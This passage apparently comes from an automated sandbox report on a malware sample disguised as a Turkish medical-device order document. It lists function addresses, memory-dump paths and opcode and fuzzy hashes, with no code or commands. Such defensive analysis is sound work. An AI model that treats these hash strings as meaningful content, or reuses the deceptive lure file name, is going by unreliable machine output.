                                                                                                                          • Instruction Fuzzy Hash: 7A51EF74D01318CFDB25DFA5D994BEDBBB2BB88300F208129E809AB258DB755946CF40
                                                                                                                          Function 01244197 Relevance: .1, Instructions: 136COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: dc91d5000080727a89b6cbd017b57190b4d6adba8a33ba479675a2789905f8f3
                                                                                                                          • Instruction ID: 3c84c92d37e09a25552662c8c3bd79aeab6639c7a2809484d08bc9974445ecc4
                                                                                                                          • Opcode Fuzzy Hash: dc91d5000080727a89b6cbd017b57190b4d6adba8a33ba479675a2789905f8f3
                                                                                                                          • Instruction Fuzzy Hash: 9951A874E01318CFCB08DFAAD58499DBBF2FF89300B208569E805AB364DB359842CF50
                                                                                                                          Function 0124D86F Relevance: .1, Instructions: 135COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7856cc74a30e69aadf04b78c596913eee2413972f2dc79dcbdd11d6a5bdb3ddc
                                                                                                                          • Instruction ID: f7f8ac2665b758cdf81d325143851baf0511a614019ad2855847adaed7453fa0
                                                                                                                          • Opcode Fuzzy Hash: 7856cc74a30e69aadf04b78c596913eee2413972f2dc79dcbdd11d6a5bdb3ddc
                                                                                                                          • Instruction Fuzzy Hash: 65518274E112189FDB58DFA9D584A9DBBF2BF89300F248169E819AB364DB30A901CF00
                                                                                                                          Function 012441A0 Relevance: .1, Instructions: 134COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a424544e2a76fb25442c8248d3e6c7508a9d1b45439ac65ff307190521ba3721
                                                                                                                          • Instruction ID: 8ed8f428a9c6983964030882f1fa9540aa66e83d45e6d367a185ac83b280716b
                                                                                                                          • Opcode Fuzzy Hash: a424544e2a76fb25442c8248d3e6c7508a9d1b45439ac65ff307190521ba3721
                                                                                                                          • Instruction Fuzzy Hash: 4E519874E01318CFCB48DFAAE58499DBBF2FF89310B208569E815AB364DB35A841CF50
                                                                                                                          Function 01249C30 Relevance: .1, Instructions: 103COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5ed265008f24d8de5edfe30dabfcfdc5199413b3f9d8cc81e52daf9499a660a8
                                                                                                                          • Instruction ID: 83dd7c09fe2959f7424e910d120ec88326981b75bbdf95a68d8f947e782d7d6b
                                                                                                                          • Opcode Fuzzy Hash: 5ed265008f24d8de5edfe30dabfcfdc5199413b3f9d8cc81e52daf9499a660a8
                                                                                                                          • Instruction Fuzzy Hash: 82319A30720205CFDF15DF68C884B6B7BA6EB8C319F548466EA58CB296D7B1DC81CB61
                                                                                                                          Function 01245658 Relevance: .1, Instructions: 101COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d9ab41152bdfc44e6f271c03c01086ed8dcdbdfaaedd54a1243deb5691a0b20b
                                                                                                                          • Instruction ID: 7a28aa58e136760720d6cce47ed4b80927e86123b1f934f19e229db0faa747fa
                                                                                                                          • Opcode Fuzzy Hash: d9ab41152bdfc44e6f271c03c01086ed8dcdbdfaaedd54a1243deb5691a0b20b
                                                                                                                          • Instruction Fuzzy Hash: C531D33164110ADFCF09DF69E854AAF3BB2FB48301F108429F9458B244CB35C961DB90
                                                                                                                          Function 01248380 Relevance: .1, Instructions: 87COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 076c2638cecd07697c254d1454f80a313888ed84776ebcabbcacda82993fe2ea
                                                                                                                          • Instruction ID: cde5ee2b2b791a004906fd46a075edc73cd10b08d2d35935cf72e47ab2db4668
                                                                                                                          • Opcode Fuzzy Hash: 076c2638cecd07697c254d1454f80a313888ed84776ebcabbcacda82993fe2ea
                                                                                                                          • Instruction Fuzzy Hash: 2921F2303302014BEB2A56AA8454B7E6697EFC4749F14803DD602CB79AEE75CC42D781
                                                                                                                          Function 0124837F Relevance: .1, Instructions: 83COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 993aec3c95700c6b8ebf2d5d4a4f41cf518e55e7f78d0b9e1d73693662676e05
                                                                                                                          • Instruction ID: c43abcc837dfab0165b9a4fb529dd05739d1c84effee6fd1324aa40a669aee40
                                                                                                                          • Opcode Fuzzy Hash: 993aec3c95700c6b8ebf2d5d4a4f41cf518e55e7f78d0b9e1d73693662676e05
                                                                                                                          • Instruction Fuzzy Hash: 5C2101303302024BDB2E57BE9894B7E66A6EFC4749714803DD602CB35AEE25C842D781
                                                                                                                          Function 012428F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0e09e93ac85179757e47afa873be38cbaac41f1500001695c8d78c9dc934c49b
                                                                                                                          • Instruction ID: 3b258604920a76317f1fe9291e7e5295d41809844aef7c5da824153f20f675ff
                                                                                                                          • Opcode Fuzzy Hash: 0e09e93ac85179757e47afa873be38cbaac41f1500001695c8d78c9dc934c49b
                                                                                                                          • Instruction Fuzzy Hash: 5921F435A10215DFCB19DB29D440AEE3BA4EF8C3A0B60C519E9098B244DB31EE42CBD1
                                                                                                                          Function 010CD554 Relevance: .1, Instructions: 75COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781393592.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_10cd000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3402f9c35d3af4ac01bc02ed376f2ab322ce861a6d8d5d10000a9326be516219
                                                                                                                          • Instruction ID: 6d77d9a72a14a97b5168d87d29cd731dab9a80df0511b5c4d3dd76adf7861e88
                                                                                                                          • Opcode Fuzzy Hash: 3402f9c35d3af4ac01bc02ed376f2ab322ce861a6d8d5d10000a9326be516219
                                                                                                                          • Instruction Fuzzy Hash: 04212171904200EFDB15DF94D9C0B2ABBA1FB88718F2085ACE8890B256C336D456CFE2
                                                                                                                          Function 010DD044 Relevance: .1, Instructions: 72COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781442729.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_10dd000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 34c1e216cef9bfbc9f2baaac78dfd388b4f8c50232160ee736b6f0f95838de3e
                                                                                                                          • Instruction ID: 6c740a1e1d3ca4fe6dd0473bbaadbb1e56652c0a2b729795dc6bc8f9307a1db3
                                                                                                                          • Opcode Fuzzy Hash: 34c1e216cef9bfbc9f2baaac78dfd388b4f8c50232160ee736b6f0f95838de3e
                                                                                                                          • Instruction Fuzzy Hash: 1A210071504304AFDB25CFA4D9C0B26BBA5FB84314F20C9ADE9890B282C736D447CB62
                                                                                                                          Function 0124A47F Relevance: .1, Instructions: 70COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 81d731da9035abc14748f0becf7badddb45e19c592db8005fd0e19494c22fb66
                                                                                                                          • Instruction ID: 6a391026cbf87abaa6f94c013fb6c8fe06819e517478a628e654b4cffbf9d5c3
                                                                                                                          • Opcode Fuzzy Hash: 81d731da9035abc14748f0becf7badddb45e19c592db8005fd0e19494c22fb66
                                                                                                                          • Instruction Fuzzy Hash: E2219231694285CFDB16CF28C448B6DBFB1EF46314F098499D64A9F2A3D371E850DB61
                                                                                                                          Function 0124A3E7 Relevance: .1, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f688507e8aa5e93fba84a6f2b894d669477b378a63609ecf2df917c17a6ea6e4
                                                                                                                          • Instruction ID: 05eb9907b569e2cf841a7347c73046363894fe95bf1aa0d9cc1f7576aaf39f44
                                                                                                                          • Opcode Fuzzy Hash: f688507e8aa5e93fba84a6f2b894d669477b378a63609ecf2df917c17a6ea6e4
                                                                                                                          • Instruction Fuzzy Hash: 6C213B316442858FDB15CF7CC848BAEBFB2EF86310F098595D65A9F293D370A815CB61
                                                                                                                          Function 01245649 Relevance: .1, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e8852da689fec03d72680cce8c17f2f84854f2dd6882fa0de178f53aa0ade30e
                                                                                                                          • Instruction ID: a10747ea470b50aa4353896e3753708d69b55a11e7701badb4ba408afe7f2a9b
                                                                                                                          • Opcode Fuzzy Hash: e8852da689fec03d72680cce8c17f2f84854f2dd6882fa0de178f53aa0ade30e
                                                                                                                          • Instruction Fuzzy Hash: 7921433160614A8FCB09EF29E4586EF3BB2EF49310F108469F9858B245CB38CD65CB90
                                                                                                                          Function 01244285 Relevance: .1, Instructions: 68COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 91bc29d70c4afbea5f0609af7e196243822b7e594bb9074ddbb906b0c942457a
                                                                                                                          • Instruction ID: 3cb09f9978d13a1bf2e69be95a6543b4c003456f3f77e2bc2f9b66796d5db432
                                                                                                                          • Opcode Fuzzy Hash: 91bc29d70c4afbea5f0609af7e196243822b7e594bb9074ddbb906b0c942457a
                                                                                                                          • Instruction Fuzzy Hash: 3A318374E11318DFCB48DFA9E59499DBBB2FF49300B208569E819AB364D731AD51CF10
                                                                                                                          Function 01249761 Relevance: .1, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e00fc56072967c5e47e11f967592bb1f4cb52a3ea4295acad9eb5e96c94f870c
                                                                                                                          • Instruction ID: b80e4febe2876048c40a82bf25600b8e3f3bc13a38527d8724bbc67c42c4f9fa
                                                                                                                          • Opcode Fuzzy Hash: e00fc56072967c5e47e11f967592bb1f4cb52a3ea4295acad9eb5e96c94f870c
                                                                                                                          • Instruction Fuzzy Hash: 73218D70E01249DFDF19CFA6E550AEEBFB6BF48309F248069E505A6290DB31D981DF20
                                                                                                                          Function 012462F0 Relevance: .1, Instructions: 64COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b3246aa646bc61ed86c01b4a6483a47d495c2b094e490fb5c0404e3b3fad3e41
                                                                                                                          • Instruction ID: a1cc84709f9c4e5f857b5fb3a7775e746149abae45a4be9222296ab4a012ba55
                                                                                                                          • Opcode Fuzzy Hash: b3246aa646bc61ed86c01b4a6483a47d495c2b094e490fb5c0404e3b3fad3e41
                                                                                                                          • Instruction Fuzzy Hash: 4D1123367956528FC7199B2AD45853EBFA2FFCAB5130844BDE506CB364CF20CC428B80
                                                                                                                          Function 0124F4E8 Relevance: .1, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0443a8569feeccd0c3bf9856561d12eb9f41337e18937fb5659f1a18e548cd58
                                                                                                                          • Instruction ID: dcd50acf5fe98379e79b10c2748be9fbf19305d86272eb85896ac986480e457d
                                                                                                                          • Opcode Fuzzy Hash: 0443a8569feeccd0c3bf9856561d12eb9f41337e18937fb5659f1a18e548cd58
                                                                                                                          • Instruction Fuzzy Hash: 5C216D74E0120A9FEB05EFB9E54469EBBF2FF44300F1082A9C1589B255EB305A05CB82
                                                                                                                          Function 01246FC7 Relevance: .1, Instructions: 57COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: de6222ceb50b2befcd120056ee9e55ea0f066cde63998026ca2bab4fb8ade788
                                                                                                                          • Instruction ID: 76c89252aa40b4e28b01f28752a6a4ee1bd93bf019ef6727cd395d0d2885aefb
                                                                                                                          • Opcode Fuzzy Hash: de6222ceb50b2befcd120056ee9e55ea0f066cde63998026ca2bab4fb8ade788
                                                                                                                          • Instruction Fuzzy Hash: FB117C35900209DFCB24CF68C844FAABBF6EB48314F04846EE52A9B211D7759949CF51
                                                                                                                          Function 010CD54F Relevance: .1, Instructions: 56COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781393592.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_10cd000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                          • Instruction ID: 24b23dd1c112fc5db3bbb4e6457fda0056b398e656bb77e0f324a481939e6d32
                                                                                                                          • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                          • Instruction Fuzzy Hash: 30119D76504280CFCB16CF54D5C4B1ABFA1FB88714F2485A9D9490B656C336D456CFA2
                                                                                                                          Function 0124F4F8 Relevance: .1, Instructions: 54COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d137b0006491582099ce83335805a3969384239ce06e4926e88a1d7bcd0ab45f
                                                                                                                          • Instruction ID: ccf5648e99d68b4011ec794c437d6fc6387723429eb66a6094ab67467ff3ca2d
                                                                                                                          • Opcode Fuzzy Hash: d137b0006491582099ce83335805a3969384239ce06e4926e88a1d7bcd0ab45f
                                                                                                                          • Instruction Fuzzy Hash: F2114C74E0120A9FEB04EFB9E54479EBBF2FB44300F10C6A9C1589B258EB705A05CF82
                                                                                                                          Function 010DD03F Relevance: .1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781442729.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_10dd000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                                          • Instruction ID: 45a4248417cad9c56dac4a42b03e313a0e42e9970ab13e23848e59a855122ba0
                                                                                                                          • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                                          • Instruction Fuzzy Hash: D011BB75504384DFCB12CF64D9C4B15BFA2FB84314F24CAA9E9894B692C33AD44ACF62
                                                                                                                          Function 012427F9 Relevance: .1, Instructions: 51COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8e5596ad07d782b1df0a82dfb92ffd8700b512f7ccd267fca8c7942dbb56acb7
                                                                                                                          • Instruction ID: 6a561bd33361b5f4fe792d95c7c55caf1e4ae2a1941e243ae157a75862aa37c4
                                                                                                                          • Opcode Fuzzy Hash: 8e5596ad07d782b1df0a82dfb92ffd8700b512f7ccd267fca8c7942dbb56acb7
                                                                                                                          • Instruction Fuzzy Hash: 7D119BB4D5120ACFCB44EFAAD9455EEBBF0BF49300F50566AD805B2224EB305A95CBA0
                                                                                                                          Function 01245EA7 Relevance: .0, Instructions: 46COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6fa3a369098ae054f8f357fac9077e54320477f033f824e0f74b2567f17e3ab0
                                                                                                                          • Instruction ID: b7a260f9d556e893964a339734882bfd2de1c1052bfcb7e3c5e32265de96d7fd
                                                                                                                          • Opcode Fuzzy Hash: 6fa3a369098ae054f8f357fac9077e54320477f033f824e0f74b2567f17e3ab0
                                                                                                                          • Instruction Fuzzy Hash: 2201A232B501156BCB159EA9A810AEF3BA7EBC8750F24C02DFA55D7284CE728D169B90
                                                                                                                          Function 01246337 Relevance: .0, Instructions: 44COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0c2be20a1de3c775f03a0487a82a8e5295b77167285e0626f9edfe10ab6ef317
                                                                                                                          • Instruction ID: e4f44cdf0be6ba2f4b34100be1986390053014f67b84fa107b2724be11db3929
                                                                                                                          • Opcode Fuzzy Hash: 0c2be20a1de3c775f03a0487a82a8e5295b77167285e0626f9edfe10ab6ef317
                                                                                                                          • Instruction Fuzzy Hash: 3401F436B525624B8E2AA729A01427FBB63EBC6F55314852DD9029B788CF31CC468BC1
                                                                                                                          Function 0124ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 47f36b5b7ad3ccae9923b4394ea9c51019d35607d7b627fb3a1a6d71c341778d
                                                                                                                          • Instruction ID: 99fbcf0e13c09526b7882ab66cdd773a5160c1efa896554961a4b3a1dc4a9534
                                                                                                                          • Opcode Fuzzy Hash: 47f36b5b7ad3ccae9923b4394ea9c51019d35607d7b627fb3a1a6d71c341778d
                                                                                                                          • Instruction Fuzzy Hash: 09F0FC317902114B972E5A2FD45462E7ADEEFC8B513454079E707CB361EE60CC028384
                                                                                                                          Function 010CD006 Relevance: .0, Instructions: 40COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781393592.00000000010CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010CD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_10cd000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 83110bbc7005588240ab102f8e304dcec3351ccc2423a1c49c9519a760c17798
                                                                                                                          • Instruction ID: eec58766bdc3c7eed2eb927fdd49f70e98ee00c6c7332dba3445d157e9c214d8
                                                                                                                          • Opcode Fuzzy Hash: 83110bbc7005588240ab102f8e304dcec3351ccc2423a1c49c9519a760c17798
                                                                                                                          • Instruction Fuzzy Hash: 95012C75108780AFD7268F15C894C62BFB9EF8666071A84CAE8858B263C625EC06CB71
                                                                                                                          Function 0124EB87 Relevance: .0, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2ebe7123de31747e42d0dd8e749932f1af39f5866c6e146dea5886f291ff80da
                                                                                                                          • Instruction ID: 3dcc2e99d483cda6badb5d07632440e3125dadd6913b8daad849b9b6a9b7b04d
